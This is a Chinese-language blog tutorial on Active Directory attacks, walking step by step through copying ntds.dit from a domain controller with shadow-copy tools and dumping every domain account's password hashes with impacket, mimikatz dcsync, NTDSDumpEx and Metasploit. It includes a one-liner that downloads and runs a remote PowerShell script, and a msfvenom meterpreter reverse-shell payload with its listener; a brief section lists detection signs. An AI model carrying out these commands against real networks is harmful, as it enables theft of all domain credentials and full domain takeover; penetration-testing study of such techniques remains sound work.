写点什么

域控安全之域渗透

  • 2021 年 12 月 04 日
  • 本文字数:7213 字

    阅读完需:约 24 分钟

在通常情况下、即使拥有管理员权限,也无法读取域控制器中的 C:\Windwos\NTDS\ntds.dit 文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用 Windows 本地卷影拷贝服务可以获得文件的副本。


卷影拷贝服务提取 NTDS


在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntds\ntds.ditntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU 等与活动目录相关的信息。它和 SAM 文件一样,是被 Windows 操作系统锁定的。在一般情况下,系统运维人员会利用卷影拷贝服务(Volume Shadow Copy Service, VSS)实现这些操作。VSS 本质上属快照(Snapshot)技术的一种,主要用于备份和恢复(即使目标文件处于锁定状态)。

一:Ntds 的提取

1.1:Ntdsutil.exe 提取

ntdsutil.exe 是一个为活动目录提供管理机制的命令行工具。使用 ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe)成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上、可以在域控制器上直接操作,也可以通过域内机器在域控制器上远程操作。ntdsutil.exe 支持的操作系统有 Windows Server 2003、 Windows Server 2008、 Windows Server 2012。

实验一:Ntdsutil 提取 Ntds.dit

步骤一:**在域控制器的命令行环境中创建一个快照。**该快照包含 Windows 的所有文件,且在复制文件时不会受到 Windows 锁定机制的限制。


1 ntdsutil snapshot "activate instance ntds" create quit quit



【一>所有资源获取<一】1、200 份很多已经买不到的绝版电子书 2、30G 安全大厂内部的视频资料 3、100 份 src 文档 4、常见安全面试题 5、ctf 大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线


可以看到,创建了一个 GUID 为{67d45168-4e4a-4b39-bc80-385d9f493dd3}的快照。


步骤二:加载创建的快照


1 ntdsutil snapshot "mount {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" quit quit



步骤三:复制快照中的文件


1 copy C:\Windows\NTDS\ntds.dit C:\Users\Public



步骤四:卸载之前加载的快照并删除


1 ntdsutil snapshot "unmount {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" "delete {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" quit quit



步骤五:查询当前快照


1 ntdsutil snapshot "List All" quit quit


1.2:Vssadminn.exe 提取

vssadminn是 Windows Server 2008 & Windows 7 提供的 VSS 管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息(只能管理系统 Provider 创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序(writers)和提供程序(providers),以及改变卷影拷贝的存储空间(即所谓的“diff 空间”)的大小等。vssadminn 的操作流程和 ntdsutil 类似。

实验二:Vssadminn 提取 Ntds.dit

步骤一:在域控制器中打开命令行环境,输入如下命令,创建一个 C 盘的卷影拷贝


1 vssadmin create shadow /for=c:



步骤二:在创建的卷影拷贝中将 ntds.dit 复制出来


1 copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit2 dir c:\ | findstr "ntds"



步骤三:删除快照


1 vssadmin delete shadows /for=c: /quiet


1.3:Vssown.vbs 提取

vssown.vbs 脚本的功能和 vssadmin 类似。vssown.vbs 脚本是由 Tim Tomes 开发的,可用于创建和删除卷影拷贝,以及启动和停止卷影拷贝服务。可以在命令行环境中执行该脚本。该脚本中的常用命令如下:


1 //启动卷影拷贝服务 2 cscript vssown.vbs /start3 1/创建一个 C 盘的卷影拷贝 4 cscript vssown.vbs /create c5 //列出当前卷影拷贝 6 cscript vssown.vbs /list7 //删除卷影拷贝 8 cscript vssown.vbs /delete

实验三:Vssown.vbs 提取 Ntds.dit

步骤一:启动卷影拷贝服务


1 cscript vssown.vbs /start



步骤二:创建一个 C 盘的卷影拷贝


1 cscript vssown.vbs /create c



步骤三:列出当前卷影拷贝


1 cscript vssown.vbs /list



步骤四:复制 ntds.dit


1 copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\ntds.dit



步骤五:删除卷影拷贝


1 cscript vssown.vbs /delete {9AB33ECE-8FF2-49A8-9305-101993C6648E}


1.4:Ntdsutil 的 IFM

使用创建一个 IFM 的方式获取 NTDS。在使用 ntdsutil 创建 IFM 时,需要进行生成快照、加载、将ntds. dit和计算机的 SAM 文件复制到目标文件夹中等操作。这些操作也可以通过 PowerShell 或 WMI 远程执行。

实验四:Ntdsutil 创建卷影拷贝

步骤一:在域控制器中以管理员模式打开命令行


1 ntdsutil "ac i ntds" "ifm" "create full c:/test" q q



步骤二:将 ntds.dit 复制到**c:\test\Active Directory\**文件夹下,将 SYSTEM 和 SECURITY 复制到**c:\test\registry**文件夹下


1 dir "c:\test\Active Directory"2 dir "c:\test\registry"



步骤三:将 ntds.dit 拖回本地,删除 test 文件夹


1 rmdir /s /q "C:\test"


步骤四:nishang 中有一个 powershell 脚本**copy-vss.ps1**通过改脚本可以将:SAM/SYSTEM/Ntds.dit 文件复制到与改脚本相同的目录...(github 上可下载 Copy-VSS.ps1)


1 import-module .\Copy.VSS.ps12 Copy-vss



备注:Powershell 语法...


1 IEX (New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/Nishang/Gather/Copy-VSS.ps1');Copy-VSS

1.5:DiskShadow

微软官方文档中有这样的说明:“diskshadow.exe 这款工具可以使用卷影拷贝服务(VSS)所提供的多个功能。在默认配置下,diskshadow.exe 使用了一种交互式命令解释器, 与 DiskRaid 或 DiskPart 类似。”事实上,因为 diskshadow 的代码是由微软签名的,而且Windows Server 2008Windows Server 2012Windows Server 2016都默认包含 diskshadow,所以,diskshadow 也可以用来操作卷影拷贝服务并导出 ntds dit。diskshadow 的功能与 vshadow 类似,且同样位于C:windows\system32\目录下。不过,vshdow 是包含在 Windows SDK 中的,在实际应用中可能需要将其上传到目标机器中。


diskhadow 有交互和非交互两种模式。在使用交互模式时,需要登录远程桌面的图形化管理界面。不论是交互模式还是非交互模式,都可以使用 exee 调取一个脚本 文件来执行相关命令。下面通过实验讲解 diskshadow 的常见命令及用法。


1 diskshadow.exe /? #查看 diskshadow.exe 的帮助信息

实验五:DiskShadow 提取 Ntds.dit

步骤一:在渗透测试中,可以使用 diskshadow.exe 来执行命令。例如,将需要执行的命令"exec c:\windows\system32\calc.exe"写入 c 盘目录下的 command.txt 文件,使用 diskshadow.exe 执行该文件中的命令


1 c:>diskshadow /s c:\commmand.txt



步骤二:使用 diskshadow.exe 加载 command.txt 文件时需要在 c:\windows\system32 下执行....


1 c:\Windows\System32>diskshadow /s c:\command.txt


1 //设置卷影拷贝 2 set context persistent nowriters3 //添加卷 4 add volume c: alias someAlias

5 //创建快照 6 create

7 //分配虚拟磁盘盘符 8 expose %someAlias% k:

9 //将 ntds.dit 复制到 C 盘 c:\ntds.dit10 exec "cmd.exe" /c copy K:\Windows\NTDS\ntds.dit c:\ntds.dit

11 //删除所有快照 12 delete shadows all

13 //列出系统中的卷影拷贝 14 list shadows all

15 //重置 16 reset

18 //退出 19 exit




步骤三:导出 ntds.dit 后,可以将system.hive转储。因为system.hive中存放着 ntds.dit 的密钥,所以如果没有该密钥,将无法查看 ntds.dit 中的信息。


1 c:>reg save hklm\system c:\windows\temp\system.hive



在使用 DiskShadow 过程中,需要注意以下几点:


  • 渗透测试人员可以在非特权用户权限下使用 diskshadow.exe 的部分功能。与其他工具相比,diskshadow 的使用更为灵活。

  • 在使用 diskshadow.exe 执行命令时,需要将文本文件上传到目标操作系统的本地磁盘中,或者通过交互模式完成操作。而在使用 vshadow 等工具时,可以直接执行相关命令。

  • 在渗透测试中,应该先将含有需要执行的命令的文本文件写人远程目标操作系统,再使用 diskshadow.exe 调用该文本文件。

  • 在使用 diskshadow.exe 导出 ntds.dit 时,可以通过 WMI 对远程主机进行操作。

  • 在使用 diskshadow.exe 导出 ntds.dit 时,必须在 C:\windows\system32\中进行操作。

  • 脚本执行后,要检查从快照中复制出来的 ntds.dit 文件的大小。如果文件大小发生了改变,可以检查或修改脚本后重新执行。

1.6:监控卷影拷贝

通过监控卷影拷贝服务的使用情况可以及时发现攻击者在系统中进行的一些恶意操作...


  • 监控卷影拷贝服务及任何涉及活动目录数据库文件(ntds.dit)的可疑操作行为。

  • 监控 System Event ID 7036(卷影拷贝服务进人运行状态的标志)的可疑实例,以及创建 vssvc.exe 进程的事件。

  • 监控创建 dkshndko.exe 及相关子进程的事件。

  • 监控客户端设备中的 diskshadow.exe 实例创建事件。除非业务需要, 在 Windows 操作系统中不应该出现 diskshadow.exe.如果发现,应立刻将其删除。

  • 通过日志监控新出现的逻辑驱动器映射事件。

二:Ntds 散列值

当我们获得了域控上的 NTDS.dit 文件后,我们肯定要想办法从中到处其中的散列值.....

2.1:EseDBexport

从 NTDS.dit 中导出用户表的第一步就是使用 libesedb 中的 esedbexport,你可以下载到最新版本。


步骤一:安装依赖


1 apt-get install autoconf automake autopoint libtool pkg-config


步骤二:进行安装


1 make3 sudo ldconfig


步骤三:到/usr/local/bin/下查看 esedbexport 工具



步骤四:使用该工具提取 ntds.dit 中的表并将结果存放在 ntds.dit.export 中。



两个重要的表为:datatable 以及 link_table,他们都会被存放在./ntds.dit.export/文件夹中.


一旦表被提取出来,很多 python 工具可以将这些表中的信息进一步提取,比如ntdsxtract就可以完美进行。


步骤五:安装ntdsxtract


1 cd ntdsxtract/3 $ python setup.py build && python setup.py install


步骤六:将 ntds.dit.export 文件夹和 system 放在同一目录下,执行如下命令:


1 dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive system --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee all_user.txt



使用以下命令导出域内计算机信息及其他信息,将会导出为 all_computers.csv 文件。


1 dscomputers.py ntds.dit.export/datatable.3 computer_output --csvoutfile all_computers.csv


2.2:Impacket

使用 Impacket 工具包中的 Secretsdump 也可以解析 Ntds.dit 文件从而导出散列值.

实验二:Impacket 导出散列值

方法一:在 Kali Linux 执行以下操作


1 git clone https://github.com/csababarta/ntdsxtract.git2 ┌──(root kali)-[/tools/ntdsxtract]3 └─# python setup.py install4 ┌──(root kali)-[/tools/ntdsxtract]5 └─# impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL #导出 ntds.dit 中的散列值。



方法二:impacket 还可以通过用户名和散列值进行验证,从远程域控制器中读取 ntds.dit 并转储域散列值。


1 impacket-secretsdump -hashes <hashdump 值> -just-dc testlab.com/Administrator@1.1.1.8

2.3:NTDSDumpex

使用NTDSDumpex.exe可以进行导出散列值的操作。NTDSDumpex 将 ntds.dit、SYSTEM 和 NTDSDumpex.exe 放在同一目录下,打开命令行环境,输人如下命令,导出域账号和域散列值....


1 C:\Users\Administrator\Desktop>NTDSDumpEx.exe -d ntds.dit -s system


三:散列值获取


以下为其他方式获取 NTDS.dit 的散列值....

3.1:Mimikatz

mimikaz 有一个 dcsync 功能,可以利用卷影拷贝服务直接读取 ntds.dit 文件并检索域散列值。需要注意的是,必须使用域管理员权限运行 mimikatz 才可以读取ntds.dit

实验一:Mimikatz 抓取域散列值

方法一:在域内的任意一台计算机,以管理员权限打开命令行环境


1 lsadump::dcsync /domain:hello.testlab.com /all /csv #导出域内所有用户名及散列值 2 lsadump::dcsync /domain:hello.testlab.com /user:Administrator #导出用户 Administrator 的散列值。

3 privilege::debug4 lsadump::lsa /inject #转储 lsass.exe 进程对散列值进行 Dump 操作 5 如果没有预先执行 prvile::debug 命令,将导致权限不足、读取失败。如果用户数量太多,mimikatz 无法完全将其显示出来,可以先执行 log 命令(会在 mimikatz 目录下生成一个文本文件,用于记录 mimikaz 的所有执行结果)。


方法二:Invoke _DCSync.ps1 可以利用 desync 直接读取 ntds.dit,以获取域账号和域散列值,输人"Invoke-DCSync -PWDumpFormat"命令(-PWDumpFormat参数用于对输出的内容进行格式化)


1 PS C:\Users\Administrator> Import-Module .\Invoke-DCSync.ps12 PS C:\Users\Administrator> Invoke-DCSync -PWDumpFormat

3.2:Metasploit

在获取目标主机后通过 Ngrok 内网穿透获取 shell 在通过以下操作......获取到域散列值....

实验二:Metasploit 获取域散列值

方法一:Psexec_ntdsgrab 模块


1 msf6 auxiliary(admin/smb/psexec_ntdsgrab) > back2 msf6 > use auxiliary/admin/smb/psexec_ntdsgrab3 msf6 auxiliary(admin/smb/psexec_ntdsgrab) > show options

4 Module options (auxiliary/admin/smb/psexec_ntdsgrab):

5 Name Current Setting Required Description


6 CREATE_NEW_VSC false no If true, attempts to create a volume shadow copy7 RHOSTS 1.1.1.8 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'8 RPORT 445 yes The SMB service port (TCP)9 SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing10 SERVICE_DISP.LAY_NAME no The service disp.lay name11 SERVICE_NAME no The service name12 SMBDomain hello.testlab no The Windows domain to use for authentication13 SMBPass 123456Aa no The password for the specified username14 SMBSHARE C$ yes The name of a writeable share on the server15 SMBUser Administrator no The username to authenticate as16 VSCPATH no The path to the target Volume Shadow Copy17 WINPATH WINDOWS yes The name of the Windows directory (examples: WINDOWS, WINNT)

18 msf6 auxiliary(admin/smb/psexec_ntdsgrab) > run

19 获取到 ntds.dit 文件和 system 复制到/root/.msf6/loot 文件夹下,使用 impacket 工具包进行解析 ntds.dit 文件。


模块二:基于 Meterpreter 会话获取域账户与域名散列值....


1 msf6 > use exploit/multi/handler #创建监听 2 [*] Using configured payload generic/shell_reverse_tcp3 msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp4 payload => windows/x64/meterpreter/reverse_tcp5 msf6 exploit(multi/handler) > set lhost 1.1.1.56 lhost => 1.1.1.57 msf6 exploit(multi/handler) > set lport 7778 lport => 777

9 ┌──(root kali)-[/var/www/html]10└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.5 LPORT=777 -f exe > ser.exe #生成的文件上传到目标机器并执行

11 msf6 exploit(multi/handler) > exploit -j -z12 [] Exploit running as background job 0.13 [] Exploit completed, but no session was created.14 [*] Started reverse TCP handler on 1.1.1.5:777

15 msf6 exploit(multi/handler) > use post/windows/gather/credentials/domain_hashdump #使用后渗透模块获取账户和域散列值。16 msf6 post(windows/gather/credentials/domain_hashdump) > show options17 msf6 post(windows/gather/credentials/domain_hashdump) > set SESSION 218 SESSION => 219 msf6 post(windows/gather/credentials/domain_hashdump) > exploit

3.3:Vshadow 与 QuarksPwDump

在正常的域环境中,ntds.dit 文件里包含大量的信息,体积较大,不方便保存到本地。如果域控制器上没有安装杀毒软件,攻击者就能直接进人域控制器,导出 ntds.dit 并获得域账号和域散列值,而不需要将 ntds.dit 保存到本地。


QuarksPwDump可以快速、安全、全面地读取全部域账号和域散列值。


ShadowCopy是一款免费的增强 型文件复制工具。ShadowCopy 使用微软的卷影拷贝技术,能够复制被锁定的文件及被其他程序打开的文件。


vshdow.exe是从 Windows SDK 中提取出来的。在本实验中,安装 vshadow.exe 后,会在 VSSDK72\TestApps\vshadow 目录下生成一个 bin 文件 vshadow.xce (可以将该文件单独提取出来使用)将文件全部放人 domainhash 文件夹中


在 shadowcopy.bat 中设置工作目录为 C:Windows\Temp(目录可以在 shadowcopy.bat 中自行设置)


执行 shaowopba 脚本(该脚本使用 vshadow.exe 生成快照),复制 ntds.dit.然后,使用 QuarksPwDump 修复 ntds.dit 并导出域散列值。运行该脚本后,会在刚刚设置的工作目录下存放导出的 ntds.dit 和 hash.txt(包含域内所有的域账号及其散列值)。

四:域提权漏洞

4.1:MS14-068

微软在 2014 年 1 月 18 日发布了一个紧急补了,修复了 Kerhers 城用户提权漏润(MS14-068 CVE201462424)所有 Windwos 服务器操作系统都会受该漏洞的影响,包括WindowsServer2003Windows Server 2008``Windows Sever 2008 R2Windows Server 2012Wins2012R2。该漏洞可导致活动目录整体权限控制受到影响,允许攻击者将城内任意用户权限提升至域管理级别。通俗地讲,如果攻击者获取了城内任何台计算机的 Shell 权限,同时知道任意城用的用户名、SID、密码,即可获得城管理员权限,进而控制域控制器,最终获得域权限。

用户头像

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
域控安全之域渗透